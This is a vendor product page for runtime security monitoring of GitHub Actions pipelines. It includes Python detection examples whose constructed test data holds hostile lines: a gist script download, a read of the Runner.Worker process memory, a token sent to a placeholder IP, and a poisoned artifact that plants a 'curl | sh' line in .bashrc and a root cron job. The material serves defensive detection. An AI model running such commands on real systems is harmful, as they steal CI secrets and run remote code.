Runtime Protection for GitHub Actions
Protect your CI/CD pipelines from supply chain attacks, credential theft, and malicious code execution with behavioral monitoring that detects what static scanning misses.

The GitHub Actions Threat Landscape
Modern CI/CD pipelines face sophisticated runtime threats that static scanning and code reviews can't detect. These attacks exploit the high-privilege environment of your workflows to steal secrets and compromise your supply chain.
Supply Chain Compromises
Attackers compromise third-party actions and dependencies, as in the tj-actions/changed-files incident (CVE-2025-30066), where existing version tags were retroactively pointed at a malicious commit, so that malicious code runs inside your trusted workflow even though the action had already passed security scans.
Credential Theft
Malicious workflows extract environment secrets and tokens by reading process memory (/proc/[pid]/mem), manipulating the CI environment, or examining .git/config files (where actions/checkout persists the repository token by default) to silently exfiltrate credentials.
"Pwn Request" Attacks
Workflows triggered by pull_request_target run in the context of the base repository, with access to its secrets and GITHUB_TOKEN, but can be tricked into executing attacker-controlled code when they check out the PR head, enabling privilege escalation.
Exploited Privileges
GitHub Actions runners operate with elevated permissions; attackers exploit these through workflow_run triggers (which run with the base repository's privileges after an untrusted workflow completes) or GITHUB_TOKEN abuse to access sensitive resources and perform unauthorized actions.
Artifact Poisoning
Attackers craft malicious artifacts that, when extracted during workflows, can write files to arbitrary locations through path traversal vulnerabilities, bypassing job isolation and enabling privilege escalation.
Resource Theft
Attackers hijack CI compute resources for cryptocurrency mining or other unauthorized uses through long-running processes and fileless malware techniques that evade static detection.
Runtime Security with Garnet & Jibril
Attacks can leverage legitimate features in malicious ways
Complete Runtime Protection
Jibril, our runtime security agent, monitors GitHub Actions workflows at the kernel level, while the Garnet platform provides centralized management, integrations, and alerts.
Behavioral Threat Detection
Monitors process executions, memory access, and network connections during workflow runs to catch suspicious activity in real-time
Active Protection
Blocks malicious actions like memory dumps, unauthorized network connections, and suspicious process spawns before they succeed
Supply Chain Monitoring
Identifies when third-party actions or dependencies attempt to access sensitive data or execute unexpected commands

Secure Your GitHub Actions Workflows
Simple Integration with GitHub Actions
Add to Your Workflow
Add the Garnet action, which installs the Jibril monitor, as one of the first steps of each job so that every step that runs after it is covered; because the agent is eBPF-based, the impact on workflow time is minimal.
```yaml
name: Build and Test with Security
on: [push, pull_request]   # a workflow needs at least one trigger to be valid
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
        # Prefer pinning actions to a full commit SHA rather than a mutable tag
        with:
          ref: refs/heads/main
      - name: Setup Garnet Security Monitoring
        uses: listendev/action@v0.16.0
        with:
          jwt: ${{ secrets.LSTN_API_KEY }}
          runtime: only
      # Your existing steps continue below
      # Garnet will monitor all subsequent steps for threats
```
Note: Our GitHub Action is currently published under the name listendev/action (our former product name) while we complete our platform migration to Garnet. The functionality and protection are the same.
Runtime Protection
Jibril monitors your workflow at the kernel level using eBPF, detecting and blocking malicious behaviors like those used in the tj-actions/changed-files compromise, where attackers dumped process memory to extract secrets.
Enterprise Monitoring Integration
For enterprise environments, the Garnet platform provides centralized visibility across all repositories, integrating with audit logs and performance metrics to identify security anomalies at scale while maintaining compliance requirements.
How Jibril Detects Real CI/CD Attacks
Supply Chain Attack Detection
In the tj-actions/changed-files incident (CVE-2025-30066), Jibril detected the attack immediately by identifying the malicious script download and memory access patterns before secrets could be leaked.
Detection signals:
- Unexpected curl requests to gist.githubusercontent.com for script downloads
- Direct reads of /proc/[pid]/mem targeting the Runner.Worker process
- Base64-encoded data being written to logs after memory access
Privilege Escalation Prevention
Jibril detects and prevents "Pwn Request" attacks and workflow_run privilege escalation attempts by monitoring checkout operations and suspicious process behaviors that static scanning can't predict.
Detection signals:
- Checkout operations referencing PR branches in pull_request_target events
- GitHub API calls attempting to modify repository content
- Network requests containing GITHUB_TOKEN values or other credentials
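To make the signals in the two lists above concrete, here is a small rule evaluator written for this page; it is not Jibril's code and does not reflect its event format. It runs each rule over a constructed stream of runner events covering both the supply-chain signals and the privilege-escalation signals. The event schema, the Runner.Worker pid, the secret value, the gist URL and the destination address are all constructed assumptions.

```python
import re

# Constructed view of one job, assumed for this example: the Runner.Worker
# pid, the triggering event, and the secret values the job was given.
RUNNER_WORKER_PID = 1234
EVENT_NAME = "pull_request_target"
KNOWN_SECRETS = {"ghs_EXAMPLEexampleEXAMPLEexample0123"}  # constructed, not a real token

BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
PROC_MEM = re.compile(r"/proc/(\d+)/mem")


def script_download(ev, state):
    """curl or wget fetching a script from gist.githubusercontent.com."""
    if ev["type"] == "exec" and ev["comm"] in ("curl", "wget") and any(
        "gist.githubusercontent.com" in arg for arg in ev["argv"]
    ):
        return "script download from gist.githubusercontent.com"
    return None


def proc_mem_read(ev, state):
    """Direct read of the Runner.Worker process memory through procfs."""
    if ev["type"] == "open":
        m = PROC_MEM.fullmatch(ev["path"])
        if m and int(m.group(1)) == RUNNER_WORKER_PID:
            state["mem_read"] = True  # remembered for the base64 rule below
            return "read of /proc/%d/mem (Runner.Worker)" % RUNNER_WORKER_PID
    return None


def base64_after_mem_read(ev, state):
    """Long base64 blob written to the job log after a memory read was seen."""
    if ev["type"] == "log" and state.get("mem_read") and BASE64_BLOB.search(ev["data"]):
        return "base64 blob written to log after memory access"
    return None


def pr_head_checkout(ev, state):
    """git fetching a pull-request ref while the job runs under pull_request_target."""
    if (EVENT_NAME == "pull_request_target" and ev["type"] == "exec"
            and ev["comm"] == "git" and any("refs/pull/" in arg for arg in ev["argv"])):
        return "checkout of PR head inside a pull_request_target job"
    return None


def secret_in_egress(ev, state):
    """A known secret value leaving the runner inside a network payload."""
    if ev["type"] == "connect" and any(s in ev.get("payload", "") for s in KNOWN_SECRETS):
        return "secret value sent to %s" % ev["dst"]
    return None


RULES = [script_download, proc_mem_read, base64_after_mem_read,
         pr_head_checkout, secret_in_egress]


def evaluate(events):
    """Run every rule over the ordered event stream; return (rule name, message) hits."""
    state, hits = {}, []
    for ev in events:
        for rule in RULES:
            msg = rule(ev, state)
            if msg:
                hits.append((rule.__name__, msg))
    return hits


# Constructed event stream shaped like the tj-actions incident, preceded by a
# PR-head checkout and followed by an attempt to send the token off the runner.
SAMPLE_EVENTS = [
    {"type": "exec", "comm": "git", "argv": ["git", "fetch", "origin", "refs/pull/42/head"]},
    {"type": "exec", "comm": "curl",
     "argv": ["curl", "-sSf", "https://gist.githubusercontent.com/example/raw/dump.py"]},
    {"type": "exec", "comm": "python3", "argv": ["python3", "dump.py"]},
    {"type": "open", "path": "/proc/1234/mem"},
    {"type": "log", "data": "Z2l0aHVi" * 20},
    {"type": "connect", "dst": "203.0.113.10:443",
     "payload": "token=ghs_EXAMPLEexampleEXAMPLEexample0123"},
]

if __name__ == "__main__":
    for name, msg in evaluate(SAMPLE_EVENTS):
        print(f"[{name}] {msg}")
```

The base64 rule is stateful on purpose: a long base64 blob in the log only becomes a finding after a memory read has been seen, which keeps ordinary base64 output (encoded fixtures, image layers) from firing on its own. The egress rule compares payloads against the job's own secret values, the same idea as GitHub's log masking applied to outbound traffic instead of log lines.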
Injection Attack Prevention
Detect context injection attacks where malicious branches or PR titles contain command injection payloads leveraging event data that's only known at runtime.
Detection signals:
- Shell commands containing metacharacters (backticks, semicolons, pipes, $(...)) that were introduced by event data rather than written in the workflow file
- Unexpected process spawns from GitHub event-related inputs
- Abnormal shell process trees indicating command injection
Artifact Poisoning Protection
Protect against file traversal vulnerabilities during artifact extraction that could enable attackers to write files outside the expected directory and execute arbitrary code.
Detection signals:
- File operations during artifact extraction writing outside target directories
- Process creation immediately following artifact restoration
- Unexpected file path patterns indicating path traversal attempts
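A practitioner's guard for the artifact-extraction case above, added here as an example (not the page's or any action's code): a zip extractor that rejects every member resolving outside the target directory, and the detection-side check of the same condition over observed write paths. The archive contents, file names and paths are constructed.

```python
import io
import os
import tempfile
import zipfile


def is_within(target_dir, path):
    """True if `path` resolves inside `target_dir` once '..' components, absolute
    paths and any symlinks already on disk are resolved."""
    root = os.path.realpath(target_dir)
    candidate = os.path.realpath(os.path.join(root, path))
    return os.path.commonpath([root, candidate]) == root


def safe_extract(zip_bytes, target_dir):
    """Extract an artifact, refusing any member that would land outside target_dir.
    Returns (extracted member names, rejected member names)."""
    os.makedirs(target_dir, exist_ok=True)
    extracted, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            if not is_within(target_dir, name):
                rejected.append(name)  # '..' traversal or absolute path
                continue
            dest = os.path.join(target_dir, name)
            if info.is_dir():
                os.makedirs(dest, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(dest), exist_ok=True)
            with zf.open(info) as src, open(dest, "wb") as dst:
                dst.write(src.read())
            extracted.append(name)
    return extracted, rejected


def flag_outside_writes(target_dir, observed_paths):
    """Detection-side check: write paths seen during extraction that fall outside target_dir."""
    return [p for p in observed_paths if not is_within(target_dir, p)]


def make_poisoned_artifact():
    """Constructed artifact: one legitimate file and two traversal attempts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("build/app.txt", "legitimate build output\n")
        zf.writestr("../../.bashrc", "curl -s https://203.0.113.10/x | sh\n")
        zf.writestr("/etc/cron.d/job", "* * * * * root /tmp/x\n")
    return buf.getvalue()


def demo():
    """Extract the constructed artifact into a fresh temporary directory."""
    target = tempfile.mkdtemp(prefix="artifact-")
    extracted, rejected = safe_extract(make_poisoned_artifact(), target)
    # Constructed write paths as a monitor might observe them during extraction.
    observed = [os.path.join(target, "build", "app.txt"), "/home/runner/.bashrc"]
    return {"extracted": extracted, "rejected": rejected,
            "outside_writes": flag_outside_writes(target, observed)}


if __name__ == "__main__":
    print(demo())
```

The check is done on the resolved path, not on the raw member name, so "build/../../x" and an absolute "/etc/..." entry are both caught by the same comparison; the member names are read from the central directory directly rather than through ZipFile.extract, so the decision is explicit and logged rather than silently normalised away.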
Why Garnet & Jibril for CI/CD Security
Protection Where Static Scanning Fails
Static analysis misses dynamic threats because malicious code is often injected after scanning, leverages legitimate features, or exhibits behaviors that only manifest at runtime.
- Catches actions whose version tags were retroactively moved to malicious commits, because the code that actually runs is what gets observed
- Identifies attacks that leverage untrusted event data only known at runtime
- Catches dynamically loaded malicious code from external sources
Performance-Optimized Security
Jibril's eBPF-based architecture provides comprehensive monitoring with minimal impact on workflow performance.
- Event-less design with negligible performance overhead
- Kernel-level integration for efficient monitoring
- No changes to your existing steps are needed beyond adding the single setup step
Active Threat Response
Don't just detect attacks - actively block them before damage can occur.
- Block memory access attempts that target secrets
- Prevent unauthorized network connections to malicious domains
- Stop suspicious processes from executing during workflows
Secure Your CI/CD Pipeline Against Modern Threats
Don't let your GitHub Actions workflows become the weak link in your security posture. Deploy the Garnet platform with Jibril runtime monitoring to protect against supply chain attacks, credential theft, and malicious code execution.